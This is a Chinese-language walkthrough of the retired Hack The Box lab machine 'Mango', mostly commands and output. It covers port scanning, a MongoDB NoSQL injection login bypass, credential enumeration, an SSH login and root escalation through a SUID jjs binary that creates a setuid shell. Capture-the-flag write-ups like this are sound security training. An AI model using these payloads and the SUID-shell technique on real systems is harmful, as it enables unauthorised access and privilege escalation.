信息收集
端口扫描
┌──(root㉿kali)-[~]└─# nmap -sC -sV -A -p- --min-rate=10000 10.129.229.185Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-31 20:44 ESTWarning: 10.129.229.185 giving up on port because retransmission cap hit (10).Nmap scan report for 10.129.229.185Host is up (0.23s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)80/tcp open http Apache httpd 2.4.29|_http-server-header: Apache/2.4.29 (Ubuntu)443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))| tls-alpn:|_ http/1.1| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN| Not valid before: 2019-09-27T14:21:19|_Not valid after: 2020-09-26T14:21:19|_http-server-header: Apache/2.4.29 (Ubuntu)No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.94SVN%E=4%D=1/31%OT=22%CT=1%CU=35063%PV=Y%DS=2%DC=I%G=Y%TM=65BAOS:F820%P=x86_64-pc-linux-gnu)SEQ()SEQ(SP=107%GCD=1%ISR=10B%TI=Z%TS=A)SEQ(SOS:P=107%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%IIOS:=I%TS=C)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7OS:%O5=M53CST11NW7%O6=M53CST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%OS:W6=7120)ECN(R=N)ECN(R=Y%DF=Y%T=40%W=7210%O=M53CNNSNW7%CC=Y%Q=)T1(R=N)T1(OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T4(R=Y%DF=Y%T=4OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%OOS:=%RD=0%Q=)T6(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)T7(ROS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=40%IPL=16OS:4%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 2 hopsService Info: Host: 10.129.229.185; OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 143/tcp)HOP RTT ADDRESS1 ... 30OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 188.51 seconds
通过扫描端口发现开放端口为80、443、22,且443端口下存在
commonName=staging-order.mango.htb,将该域名加入hosts
┌──(root㉿kali)-[~]└─# cat /etc/hosts127.0.0.1 localhost127.0.1.1 kali::1 localhost ip6-localhost ip6-loopbackff02::1 ip6-allnodesff02::2 ip6-allrouters10.129.229.185 staging-order.mango.htb
访问看看
访问https://staging-order.mango.htb
访问http://staging-order.mango.htb
漏洞利用
抓包简单爆破用户名
爆破发现返回结果都是200,没有可利用信息,根据名称猜测可能是mangodb数据库。
发现一篇文章,为mangodb注入(https://www.ddosi.org/b292/)
mangodb数据库存在基本的身份验证绕过,攻击这可以尝试在字段值中输入MongoDB运算符,如$eq(等于),$ne(不等于)或$gt(大于)。这是在PHP应用程序中使用直接从表单获取参数值的方式来构建数据库查询的不安全方法:
$query = array("user" => $_POST["username"], "password" =>$_POST["password"]);
如果此查询随后用于检查登录凭据,则攻击者可以滥用PHP的内置关联数组处理来注入始终返回true并绕过身份验证过程的MongoDB查询。
基于此我们可以在数据包中加入mangodb运算符尝试mangodb注入。
username[$ne]=toto&password[$regex]=.{1}
返回包出现一个home.php,访问看下
访问得到一个邮箱[email protected]
在github看到一个脚本,可用于枚举存在mangodb注入的账号密码
https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration# python3 nosqli-user-pass-enum.pyusage: nosqli-user-pass-enum.py [-h] [-u URL] [-up parameter] [-pp parameter] [-op parameters] [-ep parameter] [-m Method]options:-h, --help show this help message and exit-u URL Form submission url. Eg: http://example.com/index.php-up parameter Parameter name of the username. Eg: username, user-pp parameter Parameter name of the password. Eg: password, pass-op parameters Other paramters with the values. Separate each parameter with a comma(,). Eg: login:Login, submit:Submit-ep parameter Parameter that need to enumerate. Eg: username, password-m Method Method of the form. Eg: GET/POSTNoneExample: python nosqli-user-pass-enum.py -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit -m POST
使用脚本进行爆破
┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]└─# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -op login:login -ep password -m POSTNo pattern starts with '0'No pattern starts with '1'No pattern starts with '2'No pattern starts with '3'No pattern starts with '4'No pattern starts with '5'No pattern starts with '6'No pattern starts with '7'No pattern starts with '8'No pattern starts with '9'No pattern starts with 'a'No pattern starts with 'b'No pattern starts with 'c'No pattern starts with 'd'No pattern starts with 'e'No pattern starts with 'f'No pattern starts with 'g'Pattern found that starts with 'h'Pattern found: h3Pattern found: h3mPattern found: h3mXPattern found: h3mXKPattern found: h3mXK8Pattern found: h3mXK8RPattern found: h3mXK8RhPattern found: h3mXK8RhUPattern found: h3mXK8RhU~Pattern found: h3mXK8RhU~fPattern found: h3mXK8RhU~f{Pattern found: h3mXK8RhU~f{]Pattern found: h3mXK8RhU~f{]fPattern found: h3mXK8RhU~f{]f5Pattern found: h3mXK8RhU~f{]f5Hpassword found: h3mXK8RhU~f{]f5HNo pattern starts with 'i'No pattern starts with 'j'No pattern starts with 'k'No pattern starts with 'l'No pattern starts with 'm'No pattern starts with 'n'No pattern starts with 'o'No pattern starts with 'p'No pattern starts with 'q'No pattern starts with 'r'No pattern starts with 's'Pattern found that starts with 't'Pattern found: t9Pattern found: t9KPattern found: t9KcPattern found: t9KcSPattern found: t9KcS3Pattern found: t9KcS3>Pattern found: t9KcS3>!Pattern found: t9KcS3>!0Pattern found: t9KcS3>!0BPattern found: t9KcS3>!0B#Pattern found: t9KcS3>!0B#2password found: t9KcS3>!0B#22 password(s) found:h3mXK8RhU~f{]f5Ht9KcS3>!0B#2
得到两个密码,再次使用脚本枚举下用户名
┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]└─# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -op login:login -ep username -m POSTNo pattern starts with '0'No pattern starts with '1'No pattern starts with '2'No pattern starts with '3'No pattern starts with '4'No pattern starts with '5'No pattern starts with '6'No pattern starts with '7'No pattern starts with '8'No pattern starts with '9'Pattern found that starts with 'a'Pattern found: adPattern found: admPattern found: admiPattern found: adminusername found: adminNo pattern starts with 'b'No pattern starts with 'c'No pattern starts with 'd'No pattern starts with 'e'No pattern starts with 'f'No pattern starts with 'g'No pattern starts with 'h'No pattern starts with 'i'No pattern starts with 'j'No pattern starts with 'k'No pattern starts with 'l'Pattern found that starts with 'm'Pattern found: maPattern found: manPattern found: mangPattern found: mangousername found: mango2 username(s) found:adminmango
由此可得到两个账号密码
admin:t9KcS3>!0B#2mango:h3mXK8RhU~f{]f5H
尝试登录看看,登录web失败,记得端口扫描开放了22端口,登录ssh看看
使用mango账号成功登录ssh
┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]└─# sshpass -p 'h3mXK8RhU~f{]f5H' ssh mango@10.129.229.185Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageSystem information as of Fri Feb 2 05:09:54 UTC 2024System load: 0.0 Processes: 100Usage of /: 57.8% of 5.29GB Users logged in: 0Memory usage: 14% IP address for eth0: 10.129.229.185Swap usage: 0%* Canonical Livepatch is available for installation.- Reduce system reboots and improve kernel security. Activate at:https://ubuntu.com/livepatch118 packages can be updated.18 updates are security updates.Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138mango:~$ whoami&&idmangouid=1000(mango) gid=1000(mango) groups=1000(mango)
在admin用户下发现user.txt,但权限不够,无法访问
mango@mango:/home$ lsadmin mangomango@mango:/home$ cd adminmango@mango:/home/admin$ lsuser.txtmango@mango:/home/admin$ cat user.txtcat: user.txt: Permission denied
使用前面发现的另一个密码切换至admin用户
mango@mango:~$ su - adminPassword:$ whoami&&idadminuid=4000000000(admin) gid=1001(admin) groups=1001(admin)$ /bin/bash -iTo run a command as administrator (user "root"), use "sudo <command>".See "man sudo_root" for details.admin@mango:/home/admin$ cat user.txt8b2e26139da12476c7d609ab50766c76
权限提升
查看suid文件
admin@mango:/home/admin$ find / -user root -perm -4000 2>/dev/null/bin/fusermount/bin/mount/bin/umount/bin/su/bin/ping/snap/core/7713/bin/mount/snap/core/7713/bin/ping/snap/core/7713/bin/ping6/snap/core/7713/bin/su/snap/core/7713/bin/umount/snap/core/7713/usr/bin/chfn/snap/core/7713/usr/bin/chsh/snap/core/7713/usr/bin/gpasswd/snap/core/7713/usr/bin/newgrp/snap/core/7713/usr/bin/passwd/snap/core/7713/usr/bin/sudo/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/7713/usr/lib/openssh/ssh-keysign/snap/core/7713/usr/lib/snapd/snap-confine/snap/core/7713/usr/sbin/pppd/snap/core/6350/bin/mount/snap/core/6350/bin/ping/snap/core/6350/bin/ping6/snap/core/6350/bin/su/snap/core/6350/bin/umount/snap/core/6350/usr/bin/chfn/snap/core/6350/usr/bin/chsh/snap/core/6350/usr/bin/gpasswd/snap/core/6350/usr/bin/newgrp/snap/core/6350/usr/bin/passwd/snap/core/6350/usr/bin/sudo/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper/snap/core/6350/usr/lib/openssh/ssh-keysign/snap/core/6350/usr/lib/snapd/snap-confine/snap/core/6350/usr/sbin/pppd/usr/bin/newuidmap/usr/bin/newgrp/usr/bin/gpasswd/usr/bin/passwd/usr/bin/newgidmap/usr/bin/run-mailcap/usr/bin/chfn/usr/bin/chsh/usr/bin/sudo/usr/bin/traceroute6.iputils/usr/bin/pkexec/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic/usr/lib/policykit-1/polkit-agent-helper-1/usr/lib/eject/dmcrypt-get-device/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs/usr/lib/openssh/ssh-keysign/usr/lib/snapd/snap-confine
在结果看到两个二进制文件run-mailcap和jjs
https://gtfobins.github.io/gtfobins/run-mailcap/https://gtfobins.github.io/gtfobins/jjs/#suid
根据资料可得知run-mailcap和jjs程序可用于root身份执行命令,执行jjs并使用java的Runtime.Exec()函数生成一个shell
admin@mango:/home/admin$ jjsWarning: The jjs tool is planned to be removed from a future JDK releasejjs> Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').waitFor()0jjs> Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitFor()0admin@mango:/home/admin$ /tmp/sh -p# iduid=4000000000(admin) gid=1001(admin) euid=0(root) groups=1001(admin)# whoamiroot# ls /rootroot.txt# cat /root/root.txt30c7732f9b112a3f7cf812e3e2615928
原文始发于微信公众号(XDsecurity):HACKTHEBOX通关笔记——mango(退役)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论